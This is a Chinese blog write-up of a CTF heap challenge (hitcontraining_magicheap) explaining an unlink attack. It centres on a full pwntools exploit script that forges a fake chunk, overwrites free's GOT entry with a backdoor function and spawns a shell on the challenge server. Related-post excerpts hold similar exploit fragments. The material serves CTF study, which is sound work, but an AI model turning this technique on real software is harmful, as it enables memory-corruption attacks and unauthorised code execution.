hitcontraining_magicheap-unlink

于 2023-06-17 16:48:04 发布
阅读量184 收藏
点赞数
分类专栏: PWN 文章标签: pwn
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/131261859
版权

1,

在这里插入图片描述标准heap题目

查看下ld和libc版本:在这里插入图片描述

2,

  • edit功能:实现chunk溢出,伪造fake chunk
    在这里插入图片描述
  • 后门函数,覆盖got
    在这里插入图片描述- 安全的free:释放了heap上内存空间和指针置零
    在这里插入图片描述

3,
条件:
edit可控溢出;
heaparray全局指针=0x6020C0;

思路:
unlink利用

poc

from pwn import *
context.log_level="debug"

r = remote("node4.buuoj.cn",26690)
elf = ELF("./magicheap")

def create(sz,content):
    r.sendlineafter("choice :","1")
    r.sendlineafter("Heap : ",str(sz))
    r.sendlineafter("heap:",content)

def edit(idx,sz,content):
    r.sendlineafter("choice :","2")
    r.sendlineafter("Index :",str(idx))
    r.sendlineafter("Heap : ",str(sz))
    r.sendlineafter("heap : ",content)

def delete(idx):
    r.sendlineafter("choice :","3")
    r.sendlineafter("Index :",str(idx))


heaparray_addr = 0x6020C0
getshell_addr = elf.symbols['l33t']
free_got = elf.got['free']

create(0x90,b"aaaa")#0
create(0x90,b"bbbb")#1
create(0x20,b"cccc")#2


fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)
fake_chunk = fake_chunk.ljust(0x90,b'a')
fake_chunk += p64(0x90) + p64(0xa0)

edit(0,0x100,fake_chunk)
delete(1)	#unlink

payload = p64(0)*3 +p64(free_got)
edit(0,0x20 ,payload)
edit(0,8,p64(getshell_addr))
delete(0)	#getshell

r.interactive()

在这里插入图片描述

hercu1iz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Node_Intro-jayadevgithub
05-13
- `fs.unlink()`用于删除文件, - `fs.rename()`用于重命名文件或目录, - `fs.readdir()`用于读取目录内容。 七、错误处理 在进行文件操作时,错误处理是至关重要的。异步方法通常包含一个回调函数,错误对象作为...
A_E31190397_NIH-LATULIA-ROHMAH-TIYAS_WEB
03-15
- PHP提供了一系列函数,如 `file_get_contents()`, `file_put_contents()`, `mkdir()`, `unlink()` 等,用于读写文件、创建和删除目录。 10. PHP安全实践: - 避免SQL注入,使用预处理语句或参数化查询。 - ...
hitcontraining_unlink
z1r0的博客
01-13 380
hitcontraining_unlink 查看保护 在change功能里没有检查size大小。一开始直接打hook来着,结果最后add时出问题。。。。。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27530) else: r = process
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 1000
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 423
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 185
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 323
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
linux_c-code.zip_linux 文件操作_linux编程
09-14
- `chmod()`, `chown()`, `rename()`, `unlink()`等函数分别用于改变文件权限、所有者、重命名和删除文件。 5. **信号处理**: - 信号是Linux系统中进程间通信的一种方式,如SIGINT(中断,通常是Ctrl+C), ...
DES_PC--k.rar_fprintf
09-23
if (pfile() == 0) unlink(inname) else fprintf(stderr, "%s: I/O Error -- File unchanged\n", inname) fclose(outfile) fclose(infile) } exit(0)
Node_Intro-bbharath220-gmail.com
05-09
例如,你可以使用 `fs.readFile()` 和 `fs.readFileSync()` 读取文件,`fs.writeFile()` 和 `fs.writeFileSync()` 写入文件,`fs.appendFile()` 和 `fs.appendFileSync()` 追加文件内容,以及 `fs.unlink()`、`fs....
hitcontraining_magicheap buuctf
m0_57754423的博客
02-12 1251
这题的漏洞点在编辑heap: 可以自定义编辑chunk内容的大小,存在堆溢出漏洞,这道题目打法也有很多。 我自己的思路是: 利用unlink实现任意地址写的效果,修改puts函数got表为l33t,然后getshell。 exp: from pwn import * p = remote("node4.buuoj.cn",25162) #p = process("./magicheap") e = ELF("./magicheap") sh_addr = 0x400c50 bss_addr
BUUCTF【hitcontraining_magicheap
weixin_51055545的博客
02-13 1669
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
[BUUCTF]PWN——hitcontraining_magicheap
mcmuyanga的博客
01-07 1131
hitcontraining_magicheap 附件 步骤: 例行检查,64位程序,开启了nx和canary 本地试运行一下,经典的堆的菜单 64位ida载入,检索程序里的字符串的时候发现了后门 main() 可以看到,当v5=4=4869,而且magic在bss段,只要覆写magic>0x1305就能够获取到shell create_heap() edit_heap() delete_heap() 利用思路:首先通过 unsorted bin attack 覆盖 magic>
buuctf pwn(wustctf2020_closed)(hitcontraining_magicheap)(axb_2019_fmt32)
cainiao78777的博客
04-29 251
程序有alarm闹钟函数,并且有明显的格式化字符串漏洞,而且能无限利用格式化字符串漏洞,本来想用我之前的那种解法直接解决的,但是遇到了些问题(下面说),而且这个题目got表可写,所以还是老老实实打got表吧。2.编辑堆块,根据bss段里的指针,来找到相应的堆块,然后输入大小,再填充内容,并未检测原本输入堆块内容的大小,那么此处存在堆溢出。再通过读入,覆盖dest的指针为free的got表地址,然后strcpy将free的got表地址的地址覆盖为shllcode的地址。
hitcontraining magicheap
pondzhang的专栏
06-16 354
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
ls -ali $0 shellcode 任意地址改4字节 unlink house of force 拟态防御
carol2358的博客
07-23 464
文章目录rci rci 考察ls -ali显示inode 在tmp目录下创建0x2f+1个文件夹,然后随机进入一个 ls -lai 来显示当前目录的 inode, 再去tmp目录下ls -ali显示inode,找到相同的,绕过strcmp 然后$0来实现sh,绕过check2 没exp,直接nc 第一个 ...
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 413
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1651
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 848
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
el-date-picker unlink-panels
最新发布
10-21
el-date-picker是一个日期选择器组件,unlink-panels是其中的一个属性。当unlink-panels设置为false时,el-date-picker的两个日期面板会联动,即一个面板的选择会影响另一个面板的选择。而当unlink-panels设置为true...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值